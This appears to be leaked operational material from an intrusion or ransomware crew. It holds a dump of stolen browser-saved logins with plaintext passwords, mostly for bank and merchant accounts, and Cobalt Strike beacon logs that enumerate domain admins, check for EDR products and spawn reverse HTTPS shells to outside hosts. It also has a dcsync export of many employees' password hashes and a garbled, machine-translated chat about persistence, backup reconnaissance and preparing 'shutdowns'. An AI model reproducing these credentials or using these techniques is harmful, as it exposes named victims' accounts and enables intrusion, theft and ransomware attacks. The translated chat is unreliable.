(User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : missmemichael1 Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : d&mmichael1 Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://www.amazon.com/ap/signin Username : patriciachoi@missme.com Password : graceful0619 --- Chromium Credential (User: MichaelLee) --- URL : https://www.costcobusinessdelivery.com/Logon Username : soohkim@missme.com Password : sweet7706 --- Chromium Credential (User: MichaelLee) --- URL : https://login.bigcommerce.com/login Username : lisakim@missme.com Password : RRvdrr $4715 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx Username : 2987 Password : mm0058 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : michaelmaison Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://www.certify.com/Login.aspx Username : michaellee@missme.com Password : $MissRock --- Chromium Credential (User: MichaelLee) --- URL : https://login.yahoo.com/account/challenge/password Username : jclmichaellee Password : $Holy0731 --- Chromium Credential (User: MichaelLee) --- URL : https://accounts.shopify.com/login Username : michaellee@missme.com Password : MissMe8040 --- Chromium Credential (User: MichaelLee) --- URL : https://www.amazon.com/ap/signin Username : AndyP@missme.com Password : 4715Missme --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : rcrvmichael1 Password : Rcrv8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : d&mmichael1 Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : michaelmaison Password : 
Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : missmemichael1 Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : willinglee Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3019westmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 355kingsleymichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3031olympicmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://delsolpm.appfolio.com/connect/users/sign_in Username : michaellee@missme.com Password : young90058 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : pcho94 Password : whos90058 --- Chromium Credential (User: MichaelLee) --- URL : https://www.efax.com/myaccount/login Username : 2132323675 Password : 1260 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : heprmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : heprmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : Username : michaellee@missme.com Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : pcho94 Password : whos90058 --- Chromium Credential (User: MichaelLee) --- URL : https://securedmail.bankofhope.com/securereader/login.jsf Username : michaellee@missme.com Password : spa0804? 
--- Chromium Credential (User: MichaelLee) --- URL : https://engpermits.lacity.org/public/control.cfm Username : Michael Lee Password : kingsley355 --- Chromium Credential (User: MichaelLee) --- URL : https://engpermits.lacity.org/public/control.cfm Username : michaellee@missme.com Password : kingsley355 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : rcrvmichael1 Password : Rcrv8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 2987 Password : mm0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 29873180 Password : rock0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 3180 Password : rock0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 3601 Password : dm0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : michaelmaison Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : missmemichael1 Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : heprmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : pcho94 Password : whos90058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : willinglee Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : 3019westmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : 
d&mmichael1 Password : Spai8040 [*] Finished Google Chrome extraction. `````` Domain Controllers: Server Name IP Address ----------- ---------- MM-DC1 192.168.1.2 MM-DC2 192.168.1.111 MM-DC3 192.168.1.214 `````` Teemo[HQ217]MichaelLee */13384|2020Dec22 01:33:58> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain MissMe.local. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator JasonTak MEGACOM ThomasChang The command completed successfully. Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:24> shell net group "Enterprise Admins" /dom [*] Tasked beacon to run: net group "Enterprise Admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain MissMe.local. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator ServerAdmin$ ServerAdmin1$ ServerAdmin2$ The command completed successfully. Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:51> shell net localgroup Administrators [*] Tasked beacon to run: net localgroup Administrators [+] host called home, sent: 60 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator megacom megacom1 MISSME\brandonsantana MISSME\Domain Admins MISSME\IT_Admins MISSME\MichaelLee thomas The command completed successfully. ``If we're done with the fixes, then let's move on to the parsing. AnyDesk autoupdate#39932 20/01/2021 05:31:07 p. 
Ready. pjfrancocru sfe16537 corp.televisa.com, the context of the usual unconcerned user. Aha, delete. Deleted, left? I just do the build and delete after downloading. I will say for sure. Delete their last deleted log saves? Ahyhaxmasaka. But I see in the logs only 2 builds, have fixed 3 pieces. Again the same, does not understand, have to get out on another machine to fix that. Logical, first work out those with - myself, will fix me. OK. Ponjalta, the same crap, and I only interacted through injecting into the neighboring process; from the process, only in another session was it possible to work with the machine. I have such crashes only on spawn, and cured. Cobalt crashes. Interact how? You write spawn. financial.local, benihana.com not attached. 247InTouchPCl.local is minus, you've been messing with it, nobody touched it anymore. cedarfinancial.local crashes the cob. But we work the rest of them in nets. snu, where 2 other people work? If the old one was removed - OK, I told @user8 the old one is extinguished. sccy-lt04 sccy.com, you put 2 builds here? Is. How to restart? usac context dough sccy-lt04 sccy.com Microsoft Teams autoupdate#81727 1/20/2021 6:15:52 PM Ready. This netsch I restart in sccy.com, mine? 3 pieces and 1 did not arrive? Everything? Aga, all in place? Yes. lf old deleted?
Rebuild done?) Microsoft Teams autoupdate#15903 20/01/2021 05:06:56 PM Ready. netusogr.televisia.com.mx 10.170.4.168 pjfrancocru SFE16537 is user context. occdr occremote191 nk.spirit.com Skype maintenance task#13547 1/20/2021 6:07:49 PM Ready. Thank you, there's another thing. midwestsign.com 192.168.11.166 jkielsa CTXA715-04. There is such a `CTXA715-04`. I need external domain + rights type (system, user), hostname. `Mitel autoupdate#82604` fix it. Isnu, bluntly of course, I gave you several builds and the rule was not cancelled + you gave access to do them. The number you and gave several builds, just did not compare + hurry up. As many times as I told you: 1 build, 1 run. Anyway, redo faster. Technical details: why? You were told to do so, you should have asked right away... if id then it is understandable.... I don't know if you could just give out 1 dll for all domains and not bother with the tool panel. That's the point of generation: each build is unique and has its own id. Why? They still knock on the same domain? I also asked if you remember how to do it in ahue: dll and scheduled task, and delete all the old ones. Need at least 4 builds now, a new build and fix. I'm still waiting for an answer. I see in the toolbar that the last build was built 1.5 hours ago. Have you forgotten that 1 fix = 1 build? I will ask a very simple question + mount the same build...? Tell me, how long have you been binding? financial.local 1 = Skype autoupdate#35434 1/20/2021 5:38:26 PM Ready. ? 192.168.0.2 Hgutierreze SFE18491 CORP.TELEVISA.COM.MX McAfee autoupdate#45234 20/01/2021 04:34:49 PM Running. + are you building on both domains, yes?
corp.televisa.com.mx 10.170.4.168 pjfrancocru SFE16537 2 1 so far yes. about by which are they? `CTXA715-04` never arrived? all dll are there and staska too? so far, both passed `midwestsign.com 192.168.11.166 jkielsa CTXA715-04` as @user7 koba hung with this session u9 in solo mount? nk.spirit.com 10.0.0.20 occdr occremote191 any more mounts? which were previously mounted also mark the process, there was a little snack something mounted? so where there is no anchor - where anchored write + the very first characters in the Note the main anchor can be in which coba is the difference? in the input can? but you have access to the builder before i did) clearly, just did not do so before you are not going to work only with 4 nets? there's not 1 to 1 if all i did not understand, we need to fix all nets or only their own? only 2 nets what else is fixed? add comments in the input coba corrected above message in the general coba do mark what is fixed there, i shoot hell you do spawn @user8 look activity session you need as many networks to fix either further or do not do the rights?
```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] tmevtmgr.sys Found
[+] TMUMH.sys Found
[+] 2 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] Trend Micro Inc Found!
```
```
====== AntiVirus ======
Engine : Trend Micro Apex One Antivirus
ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\NTRmv.exe
Engine : Windows Defender
ProductEXE : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
Engine : Trend Micro Apex One Antivirus
ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe
```
what's up with the av? no deletion of the deletion to fix and it's not flying to my coba what domain? long but it's not flying yet what?
```
Adobe SvcRestartTask#20900 1/20/2021 4:10:24 PM Ready
```
what's the name of the task? stask? dudl in place? yes, I made a new one and fixed it with the same build? I don't see 10.0.0.59 system* sccy-05 I have this domain, marked another session is taken and not signed
```
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
```
We're losing our job, we don't know it in the shower, but it's empty.
```
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
Teemo beacon> spawn https
[*] Tasked beacon to spawn (x64) windows/beacon_https/reverse_https (ownjar.com:443)
[+] host called home, sent: 261643 bytes
```
guys I'm really asking you to mark the taken sessions work and is fixed? main.crispregional.org I opened the conf, no conf) if there is a conf, can you add the fix okkonf?
fix is okkonf, ie, it was not marked I took it, and so is it
```
192.168.0.2 SYSTEM* SFE18491 CORP.TELEVISA.COM.MX
```
`CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P` and you can create a group with this domain
```
10.1.111.100 jgemperline BEN1064-MGR-10 benihana.com
```
and more external domains please write +a, everything. see the file and stack 173.234.155.15 192.168.75.175 https SYSTEM * CRRHORC19 no such thing... SYSTEM * CRRHORC19... system and company name or domain name... I need hostname? SYSTEM * CRRHORC19 okay. then you do not bother For now, yes, I need to prepare labo for tomorrow, but I'm around) everyone okay with the builds? if there is a domain at once admin operatively collect hashes to brut for @tl2 and do as @user9 shall switch module yes, it worked @user3 you're not with us yet, right?
```
{ { "domains": [ "kalarada.com", "tuxomibo.com" ], { "bit": "x64", }, "period": "15", { "lasthope": 65 }
```
didn't help relogin tried? give parameters from show? the same crap no download not a single marked session where @user3 @user7 ? fix promptly or you stupidly have nothing to work with and domains vtoolpanel updated bildraskid now fixes to entry points not marked, in the entry coba alive not marked any sessions in the input? 2 people and one has a dead session you have windows, all do not bind me?
```
4836 924 naPrdMgr.exe
```
Then what av? elfkbkfcmdaa should be in the folder after startup?
I don't see 2 min 2 vby amongst the tocscscs
```
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Adobe Acrobat Update Task                1/21/2021 1:00:00 PM   Ready
AdobeGCInvoker-1.0                       1/21/2021 8:06:00 AM   Ready
G2MUpdateTask-S-1-5-21-1989139100-303601 1/20/2021 2:38:00 PM   Ready
G2MUploadTask-S-1-5-21-1989139139100-303601 1/20/20/2021 3:47:00 PM Ready
OneDrive Standalone Update Task-S-1-5-21 1/21/2021 11:04:46 PM  Ready
```
is is there? already read above)) without YES still yes no session 173.234.155.15 192.168.37.115 https amypriest CRRHHHCC4 did you spell it? where is it? then the session fell off crackDa @all anyone here? which are already there are 2 domains can be so that several sessions from one network always check the domain now mbe domains will change do not run) before starting tell where you start so by the classic anchor entry points know how to start do you know how to do the last just 65 interval from 15 to 20 just check both domains questions how to use any? + see the new toolkit? made you a new section in the toolkit would be very good at once up to YES and fix it) dismantle? one is) empty... entry coba
```
192.169.6.82 https://ownjar.com
----------------------------------------------------------------------------------------
185.150.190.153:49698 9AR3B4a2bORZSN28ST8wLqbH0F0Wvo5buE2
```
Be distracted for now, coordinate with each other and to the confabulary clarifying questions and logs on the work to try to close today let's all work on balimore five a where @user9 ? @user3 off waspoca 4 how many of you? will balimore will spin, search nasa backups and stuff like that?) hello everyone have tasks?
another storage, same credits
```
https://10.20.4.52/ui/#/host/storage/datastores
```
```
portscan 10.20.4.56
```
HOBBES\SAVDBAdm exp.FederalSAV to see what's on the server - root that is, won't remove the snapshots but lock the virtuals themselves inside that what to do? @tl2 what to do? and it's not like it's a nix server there 43 tb I see floppy disks and stuff check the snapshots of the virtuals I found this `beremote.exe` Symantec backup this thing is not in the ad comp This one's not available? 5480 What pool did you scan? It's not available Go through the ip on the full url aga available
```
10.20.4.56:636
10.20.4.56:514
10.20.4.56:443
10.20.4.56:389
10.20.4.56:88
10.20.4.56:80
10.20.4.56:22 (SSH-2.0-OpenSSH_7.4)
```
I'll try the ip 443 is open? yes it resonates at all? from the car threw it go to the ip from his car then)) and you threw sox...? not more precisely the creeds, and generally does not go to the link more access no more?
```
>operatingSystemServicePack: Likewise Open unknown.unknown.unknown
```
nix, creeds don't fit No, everything must be fine everywhere otherwise how would we work = ) almost all and all machines with the same la ; it's nice to see for once properly configured service aces what interesting creeds they have) It worked, thank you. Bind PIP try `USCHI-BKP110` looks like veam
```
>description: Hyper-V server USCHI-VHH010.Hobbes.loc
```
57/146 alive 10.20.32.20 vCenter 5.1 Server 2013 - PCHIAPG008.Hobbes.loc vCenter 6.x - USCHI-VCH001.Hobbes.loc can also let into the admin in the center quite under the domain credits DA of some cv-check fs and disks? vcenter seems to be on wind make sure the snapshots are also stored there on the server pinging, sorting and so on and look at the OS backup server also marked in the adcom, it's also Windows)
```
>description: vCenter 5.1 Server 2013
>description: vCenter 6.x
>description: vCenter 5.1 Server 2013 vCenter 6.x
>operatingSystem: Windows Server 2008 R2 Standard
```
+++++ everything here? user9 user4 go to tech look up backup information make sure you have access to the center (or that it is on the wind and will fit) see where the vias is backing up and you can nabiOknah it need to passthrough backdoors there? then do not mount if today shutdowns shutdowns today? dll give you the server and so on can prepare it for shutdowns at once avvs took two servokanals?
```
Teemo[PCHIDCG003]SYSTEM */4764|2020Dec11 00:33:52> dcsync Hobbes.loc
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:Hobbes.loc /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'Hobbes.loc' will be the domain
[DC] 'PCHIDCG003.Hobbes.loc' will be the DC server
[DC] Exporting domain 'Hobbes.loc'
```
LT-000062$ 7b1400afe0422cd09214379bb43bf5b7 4096 39977 Martin.Nysten c9ffb510567a4fb9c53d582b19d1b775 66048 39976 Henri.Kaakinen 40b0365d0aafc03f0a2f18889992533c 66048 39974 Anne.Holmedahl fe7860b8f03341f1e8c31109febd9a65 512 39975 Tomas.Dahlstrom acac0693730e97b33d632dddfbcd402 512 36657 Jon.Balis 4932ad17240c95071bf89671861d4b3d 512 40723 Hal.Ogle 9217a7a7344287c75baeced4c323fc657 514 40240 LT-000065$ 0d0be3f93585984dbddf865801591504 4096 39834 TB-000020$ 942b2001fe351767803d483ee50a40a4 4096 44744 38thJS-Chicago 7cae723808d12238a6d0aa770aa52edc 66050 44843 $DUPLICATE-af2b f7c1456efea13f09528df39630981eab 66048 33915 LT-000043$ 0c4e526e1a67941e2c6fdcbd0f8e913e 4096 39972 DT-000034$ a3378c962533a77845fcde78ede9b917 4098 34843 DT-000026$ cf92a94eb87ca142c3bba401299e2caf 4098 21805 DT-000019$ c0bf3fba46614a0872b46cbecaccd018 4098 34189 Hilary.Kramer b2930fcc52bdf8c3c5912fd972fb83cf 512 39827 AntwiP d74a3b0bf69e24da7b2d9198fd4ad3f2 514 40374 AdcockL fe327068714bfe601b48a107846021f7 514 40507 AllisonA 5b4797463c83662f4d0de1361b5e487b 514 34175 BankstonG 8a28fc18e98844278a7c38675c8bbdcf 514 34176 BlaizeR f3bb0a64824454cf3e284f4597cc1712 514 34109 BloyA 7f2802556b4b7e55ffb06c038ee9f8fa 514 34177 BoswellE 3db0d8dc19b5dd15f5b020d07bbead2d 514 34178 BoyceS 5b4797463c83662f4d0de1361b5e487b 514 34106 BrodieR b61275d2ec88934b37f5afdd4ef078f7 514 40732 CardosoD b2a7e3900b8dba04582ef2a39bdcc445 514 34103 CanfieldT 627ba3cd4c5f2fd57a6a324d115d5b4a 514 34179 CarlisleM 5b4797463c83662f4d0de1361b5e487b 514 39673 CarringtonE 8d4add6965b2bd0b3fae399d0609c5be 514 33973 CarrollB 26b23421373fe0324fac8f94a87cefeb 514 34003 ClarkL a198c19e77e1a508998e3abc2a0f9e78 514 40412 ClarkeP 90c7f2ff15c2932287a42f3049051fd6 514 39664 ClemensA 5b4797463c83662f4d0de1361b5e487b 514 39459 CoburnS 08acfd3bd91566d95b6c8270edbd89ce 514 34180 ColeG 5b47963c83662f4d0de1361b5e487b 514 37773 CurtisJ 6e2a080b0fc6d7e087576b33f8594e6b 514 37771 DanielsT 63ee0ea467a1a4e5c756e03cc70f3b58 514 34110 DavidsonD 
229f207249b1997283811bfd5fb8cce5 514 40246 DavisW 723e724006eeff9a35b72edae0488926 514 39657 DawoodM 562302da595bf3c5a53f61737b89d00e 514 40469 DickensJ 3be71c369d16f9a266898cee023160d1 514 40272 DicksonP 283963c43af73a02dab37a4e364ab671 514 39817 DoalP 5b47963c83662f4d0de1361b5e487b 514 39797 DonnellyM 9a5d1d91633d630563ea62842e15af93 514 39478 DouglasS ebe0a5dc6c4606cff2c91a0ac3e61683 514 37392 DruryD e02ef0c51b92679038ef9d29cb6851a0 514 40373 EggeR 34fb4b879f1787cc729cb16db2bc37ca 514 40413 EspenellS 129b53899a0da3a5d066debaeb356083 514 34173 ZellerD 5b4797463c83662f4d0de1361b5e487b 514 39646 WinterL a8365bcfa8cd1267ef91724d33b7ff8b 514 40472 DaviesM bacd9d73be5a2ba06d0e5c6a90176e26 514 37770 FordJ 3cfe34fc74799db847b54a0e0076bb87 514 40461 GrantW 5b4797463c83662f4d0de1361b5e487b 514 34116 ThompsonA 88a62f71f624d8a012cdc2277bb477d0 514 34114 StultzA 4ec0229f5e896218ac09d4e846f71aa4 514 39675 FerrerE b7d755f688fa59c59724926fc2d1e53 514 37410 FlynnK a4b0c1e341f88c3f63094357b6bcab07 514 34111 FlennikenC af4469150bed799249e1ac7bc6843cfc 514 39663 GipsonD 5b4797463c83662f4d0de1361b5e487b 514 39815 GonzalezA 49c06ecf430561c5ee8c9850d6929abc 514 34171 WithingtonA 5b4797463c83662f4d0de1361b5e487b 514 34117 WilliamsS e2c7f3acbdc1693905458f1d06ce6ed6 514 34187 WhitewayM 5b4797463c83662f4d0de1361b5e487b 514 40251 WantyJ ae9dbb47467d4f50d95e4050555eb815 514 39618 TorresB be5d4ef4160d6ff5be2ed7bb9be19c41 514 40381 ThrefallS bfb1866efc1498c92a9dd2f1a257dee0 514 39412 ThompsonG e29c0eaeec9017f660bf844c5accd5be 514 39692 SpeddingC 05a889bcace624ca424b7375effc50be 514 34219 SooJ 5b4797463c83662f4d0de1361b5e487b 514 34730 DT-000030$ eec1674a97a38d00255c58581740e740 4098 19712 DT-000024$ 1c39e1ec9987101777b548a1761b9f4e 4098 39691 WardD 5b4797963c83662f4d0de1361b5e487b 514 41227 WilkieA 9b2c10709be1651b432a9c7457a408ec 514 39669 SmithE f0e75c2f4f8fe9c519c47a4fe7925755 514 34104 SmithN c37ba0501770c2b618e32a9173f16860 514 39651 SampsonB f6569c298b4423f2c593880ebbfed61a 514 39613 
RuizR b42c176e0d572b855393e1dec862f746 514 34115 RuttledgeJP 0f5f8475cc3702f59e3aa87c5cf0850e 514 34113 RossP cc151c3504a4266140be7e2312cbf034 514 34102 RossJ 95ba9b6d596822bb61f668fda395ddea 514 40403 RiveraL 5b72d50e769a9ddb7a3162f42ed97305 514 40414 RileyL 04956f90d97fa9695346978b9b9b5a05d2 514 34186 PoinkB 5b47963c83662f4d0de1361b5e487b 514 39796 OreillyJ dac6055d9420381642123c4cc15b32f9 514 39671 OliverM 1fafbb6772e2e43295f1e9475449d590 514 39672 OliverL f91ba18ad93fca01f6c38caaed7e60ea 514 39548 MeechanA 853e983a071ea8b6284e460d06dc18b1 514 34075 MedinaA 2bcf220191442aee1cefdee33077eb08 514 34105 MeahN c0cb9bcd981b5255d7e1f2c33190edd6 514 39538 MeacockL 6bbe3caa4fd80d4f0a8fa743ead277d7 514 39539 McQueenA febbf01663e6bdd83ead5e215c9b4f74 514 34174 GrizzellF 5b4797463c83662f4d0de1361b5e487b 514 37772 GwinnD f1c0edaf92c7dfcf597a2d9c3d9dfc2a 514 33995 HarronJ 77fe4946a3ac9ee59f7ff9f79f8b2cc7 514 39414 HaussermanD dfed90ede4870a106b17a5901b5c8fb7 514 40462 HinesG 5b4797463c83662f4d0de1361b5e487b 514 40372 HolzapfelN 34fb4b879f1787cc729cb16db2bc37ca 514 40506 HoseyA 5b4797463c83662f4d0de1361b5e487b 514 39654 RembertD cbf1f5da453dfec1f0c345fa2bd70471 514 37764 PeriniK 5221413c81a81f4cb055bf45c4c4a9bf 514 34097 MillarC 67553437c27c43d29d718506e84b6108 514 39655 MitchellJ e64e20b41756911e2f2ea477e8bd6a5b 514 40464 McCahonN e49d39ca7c49f4b3eb55140b920b418e 514 40247 McCashJ 1ffab4f707e4c8a3df182dd38a2e793b 514 34000 McAlindenD 39e99315b830079e74277156356d89d7 514 40508 MainR 5b47963c83662f4d0de1361b5e487b 514 34182 HuetsonR 5b4797463c83662f4d0de1361b5e487b 514 39816 HunterB 26fe990acf913a897349ac5b18f00cf2 514 40252 HunterK 14ef25a77bf61da1a3df6e12894f5d6c 514 39798 JervisR 74acf26eee8a6d77438cb18f3bb69cd2 514 39451 JohnstonL 71946fe6b28cdbf61c2ae45fbe54c8b9 514 40383 JonesK e0ac8df51ec5424e14385626f8d7b2e0 514 40292 JonesM 034262bb094d2d4f43cae6a8b71719c8 514 39792 KarklinR 5b4797463c83662f4d0de1361b5e487b 514 40273 KempI 0e767640997bb9048f30f79ca4bc6336 514 34112 
KinsellaD 37ad237679939397297b7301c313ca5698 514 34172 KirkpatrickD 5b4797463c83662f4d0de1361b5e487b 514 34101 LaBarberaS b8ed3f47c54c44c15801dd7121b55e06 514 34183 KwofieP 5b4797463c83662f4d0de1361b5e487b 514 40476 LopezM 79c1b69f9f2df64cc395e6a215c7c197 514 34001 McFarlaneP 2a44c8a91fc72b754eff6e592d03968a 514 39480 McGrathP cf2776ab9dad115fef5ae259896e4382 514 39794 MckenzieG df81740d6be93bb29105c77bb4c6b4fb 514 34184 McLeanA 5b4797463c83662f4d0de1361b5e487b 514 41091 Austin.Brandmeyer ff2f6abc4abad20017a802d8ba5a9f81 512 20119 SVC-PrimaCM 412b79dc3e728e1560b2165eeaba8ab7 66050 20118 SVC-PrimaP6 25e434e77bcddbf10143cdb6eaab96f0 66050 20231 SVC-SANHQ 322782f18ed1b1b508f3ba9adfebde04 66050 41746 DT-000039$ 7c37dd5816349e937f58097839119540 4096 33967 EpsteinJ 8026afb0bdf92a426198d05d4daa6381 514 40290 EhlersJ bcd0d654e20ef7b7c68582a25e384605 514 22116 DUFRENED 3d4794814273d7331a02343644b15478 514 39838 DeJulioD eb3f2271e017f7841f1dd9830eca363a 514 39265 DahmsD e6e51feb46ef9d0891c4c00d31d6c1f8 514 37243 CorderT 735967ca19d60c8da1cdeb56ae10f343 514 37579 CondittD e74ff302df9369f1be916c858045e767 514 37241 BrannanA 64e335420b4a1ab304ec1227e2f5df5f 514 37648 BlumenfeldC 230fd162f88144b491339f0a9d4927a5 514 37411 BellF 1f716508598420de95b44cfa3cae8ce2 514 40360 BayaraaA b545e044646423b2af939164a23f8b3980 514 40976 BatesA c9383e64986894022d4dbf77ab6aa111 514 40289 BatallasF eb7fd4b5b2689d67c5ce35079cca3063 514 36554 BarrettS 7bb0280d27e89c93cdbc645b13604b1e 514 40972 BaldaufM f7fd27190c311eb66a14044c562721 514 34080 AucremnneF 12f7daf81a6c4a600a5c95edbab42d99 514 22115 ALIL 7cae723808d12238a6d0aa770aa52edc 514 22117 GilkersonM 9557ca53d791c1742083f2efc3a32975 514 22748 GoldmanB 0b5a70320bce74ecdc5cbed173df6d31 514 22103 HebelE 0016460b6827e05d2c9886748fc956ce 514 40510 HeimsothC e39ad603ff9d28c9a2fbe3847199c559 514 22119 HessS cd57ba6cd74b8fb4c72cba006fe92417 514 18216 HOMZ 64c429dd975ced59d14a6eab2d4d94be 514 34005 KendrickJ eb8d6f070f86ca9ad658d2ffabe2cf70 514 38576 
KettonA 887afa58d7bf0408b481a683a23369c1 514 40529 LeahyM aedf5aece6b1b94bdf4c75c73a7a5523 514 37535 LihosJ 9557ca53d791c1742083f2efc3a32975 514 21830 LissK 230fd162f88144b491339f0a9d4927a5 514 37242 LoweT c69fa4447670f5eaa92304f77c12671e 514 36237 McDonaldA 1821dface7c0f084d4735d5d39aafa79 514 39324 MendezE b013ab33774cd59765fc7d11e3545446 514 21844 OgrenC 2863e55ff30535d8f459f915a932899 514 37534 OtrembaP ab36e5b1759cf554d339bd33f2b19332 514 37001 OttmanJ 73c418922ecef68aacb1bfa2ce024987 514 40322 PantosW dd6e82e3d26b25543e687924f94a924b 514 21808 GomezM 81ff48d9e3318a0eeb6e9b298f6e6212 514 37721 ReichlB ab36e5b1759cf554d339bd332b19332 514 39291 SantelikS 8d4add6965b2bd0b3fae399d0609c5be 514 34078 ScottJ 12f7daf81a6c4a600a5c95edbab42d99 514 20238 SMEDLERR 0ac5a8f2c28bc1e8be40d68039979ed5 514 19592 SpApPools_dchiapg002 ff76d8d7e60b8836a8f0b102d7eeb033 66050 19590 SpApPools_dchiapg003 938caad34b8137fea6464087e81e15f3 66050 19587 SpApPools_pchiwsg001 8c791760538be58aed191364b4d972f9 66050 19533 SPAppPools_dchiapg00 ff76d8d7e60b8836a8f0b102d7eeb033 66050 19531 SpFarm_dchiapg002 deec715429f11a1d5c556464088c4296 66050 19588 SpFarm_dchiapg003 87697f1c25dce7744ec520a3ec20c3fb 66050 19532 SpServiceApps_dchiap e55d7c7a89eb2996d933488d0bc42b87 66050 19593 SpSvcApps_dchiapg002 e55d7c7a89eb2996d933488d0bc42b87 66050 19589 SpSvcApps_dchiapg003 845a2f6233d70f797dca62c0a4066326 66050 39676 SquitieriA c37521b11299ddf037ac81977a764fc9 514 2745 STONEMA ca0133ef175d6e6c68fb5b2e9d90744c 514 41009 TracyA a5dc1b8ef655117116382e1927159a3b 514 34079 WadeA 12f7daf81a6c4a600a5c95edbab42d99 514 34322 WenzelB d887c5c26e6661040cf4ec5899cff69d 514 38519 WolbrinkV b91c9718c5d73b1598e6716ca6553f09 514 37505 ZinitiC 23771142359b165bcb2f918635ebddb1 514 36851 WomeldurfT bede8fc9638c3ae7f3097e40e1486ecc 514 2169 BOURISGZ 26a815ff8f283b835a39fd74b560695a 66050 21756 BrainerdM bdfc3479d37a35d8269ca95747188c9c 514 2086 BUADORT 26a815ff8f283b835a39fd74b560695a 514 12895 CHAIDEIZ 
